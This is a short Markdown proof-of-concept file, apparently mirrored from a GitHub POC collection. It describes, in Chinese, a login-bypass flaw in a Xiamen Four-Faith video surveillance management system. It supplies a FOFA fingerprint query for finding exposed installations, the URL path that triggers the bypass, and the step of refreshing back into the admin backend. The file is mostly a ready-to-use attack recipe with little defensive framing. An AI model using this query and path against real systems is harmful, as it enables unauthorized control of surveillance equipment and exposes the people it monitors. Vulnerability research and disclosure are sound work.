mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
21 lines
584 B
Markdown
21 lines
584 B
Markdown
|
|
## 厦门四信通信科技有限公司视频监控管理系统存在逻辑缺陷漏洞
|
||
|
|
|
||
|
|
厦门四信通信科技有限公司视频监控管理系统存在逻辑缺陷漏洞,可直接绕过登录进入后台。
|
||
|
|
|
||
|
|
## fofa
|
||
|
|
|
||
|
|
```
|
||
|
|
body="/monitor/realt/init?curPageId=a1"
|
||
|
|
```
|
||
|
|
|
||
|
|
## poc
|
||
|
|
|
||
|
|
```
|
||
|
|
/mgrcter/usermgr/user/Login.action
|
||
|
|
```
|
||
|
|
|
||
|
|

|
||
|
|
|
||
|
|
返回登录页面刷新一下进后台。
|
||
|
|
|
||
|
|

|